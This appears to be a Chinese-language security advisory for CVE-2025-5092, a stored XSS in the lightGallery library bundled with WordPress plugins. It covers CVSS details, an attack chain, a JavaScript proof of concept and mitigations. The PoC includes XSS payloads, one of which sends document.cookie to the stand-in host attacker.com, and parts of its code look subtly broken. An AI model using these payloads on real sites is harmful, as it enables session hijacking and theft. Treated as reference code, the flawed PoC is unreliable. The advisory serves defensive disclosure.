CVE-2025-5092 WordPress插件lightGallery库存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-5092

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress插件/主题（bundled lightGallery <= 2.8.3）

漏洞概述

CVE-2025-5092是WordPress生态系统中多个插件和主题存在的安全漏洞，源于这些产品捆绑的lightGallery库版本低于或等于2.8.3。lightGallery是一个流行的JavaScript图库插件，被广泛集成在各类WordPress主题和插件中。该漏洞的核心问题在于对用户输入的属性值缺乏充分的输入清理和输出转义处理，导致攻击者可以在图库组件中注入恶意JavaScript代码。由于是存储型XSS漏洞，恶意代码会被永久保存在服务器端，所有访问包含恶意内容页面的用户都会受到攻击影响。攻击者只需要获得WordPress网站的Contributor（贡献者）或更高权限即可实施攻击，这大大降低了攻击门槛。漏洞影响范围涵盖所有使用受影响版本lightGallery库的WordPress产品。

技术细节

该漏洞属于存储型跨站脚本攻击（Stored Cross-Site Scripting），存在于lightGallery库的JavaScript代码中，具体是处理用户提供的属性参数时未进行适当的输入验证和输出编码。攻击者可以利用此漏洞在图库的HTML元素属性中注入恶意的脚本代码，例如在data-src、data-sub-html等属性中嵌入<script>标签或事件处理器（如onerror、onload等）。由于lightGallery在初始化时会读取并处理这些属性值，将其插入到DOM中执行，未经过滤的恶意代码将被浏览器执行。攻击者通过在文章或页面中插入带有XSS payload的图库短代码或块，当其他用户访问该页面时，存储的恶意脚本会在其浏览器上下文中执行，可能导致会话劫持、敏感信息窃取或进一步的攻击链。修复方案需要升级lightGallery库到最新版本（> 2.8.3）并确保正确配置输入过滤和输出编码机制。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标WordPress网站使用的插件/主题是否包含受影响的lightGallery库版本（<= 2.8.3），可通过查看页面源码或直接访问插件目录确认

STEP 2

权限获取

攻击者通过钓鱼、密码爆破或其他方式获取WordPress网站的Contributor（贡献者）账户凭据，获得在网站上创建或编辑内容的权限

STEP 3

恶意内容注入

攻击者在文章或页面中插入带有XSS payload的图库组件，利用data-sub-html、data-src等属性注入恶意JavaScript代码，如<script>alert('XSS')</script>或事件处理器onerror="..."

STEP 4

持久化存储

包含恶意代码的内容被保存到WordPress数据库中，由于是存储型XSS，payload会永久存在，每次页面加载都会执行

STEP 5

触发执行

当其他用户（管理员、编辑或普通访客）访问包含恶意内容的页面时，浏览器解析HTML并执行lightGallery初始化脚本，触发存储的XSS payload

STEP 6

恶意行为实施

XSS payload在受害者浏览器上下文中执行，可窃取会话Cookie、劫持用户会话、重定向用户到钓鱼站点或进一步利用管理员权限进行更深层次的攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-5092 Stored XSS PoC via lightGallery
// Requires Contributor-level access in WordPress

// Method 1: Via WordPress shortcode with malicious data attribute
const xssPayload1 = '" onerror="alert(String.fromCharCode(88,83,83,32,80,111,67))" data-source="';
const maliciousShortcode = `[gallery ids="1" data-sub-html="${xssPayload1}"]`;

// Method 2: Via HTML/JavaScript injection in lightGallery settings
const xssPayload2 = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>';
const maliciousConfig = {
    selector: '.gallery-item',
    exThumbEntity: '${xssPayload2}',
    dynamic: true,
    dynamicEl: [{
        src: 'legitimate-image.jpg',
        subHtml: xssPayload2
    }]
};

// Method 3: Via data attributes on gallery elements
const xssPayload3 = 'javascript:alert("XSS via lightGallery")';
const maliciousHtml = `
<div id="lightgallery">
    <div class="gallery-item" 
         data-src="normal-image.jpg" 
         data-sub-html="${xssPayload2}"
         data-video-src="${xssPayload3}">
    </div>
</div>
`;

// Exploitation steps:
// 1. Obtain Contributor or higher privileges on WordPress site
// 2. Create or edit a post/page
// 3. Insert gallery shortcode with XSS payload in data-sub-html or similar attributes
// 4. Publish/update the post
// 5. When any user views the page, the XSS payload executes in their browser context

// Detection: Check for lightGallery version <= 2.8.3 in source code
function checkVulnerableVersion() {
    const version = '2.8.3'; // Read from lightGallery's package.json or script tag
    return parseFloat(version) <= 2.8.3;
}

影响范围

lightGallery <= 2.8.3（所有捆绑此版本的WordPress插件和主题）

使用受污染lightGallery库的WordPress主题

使用受污染lightGallery库的WordPress插件

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）禁用或移除网站中使用lightGallery图库功能的内容；2）在Web服务器层面配置XSS过滤规则；3）限制低权限用户（Contributor及以下）创建和发布内容的权限；4）部署内容安全策略（CSP）限制脚本执行；5）使用WordPress安全插件进行实时的恶意内容扫描和防护。同时建议尽快联系插件/主题开发者获取安全更新。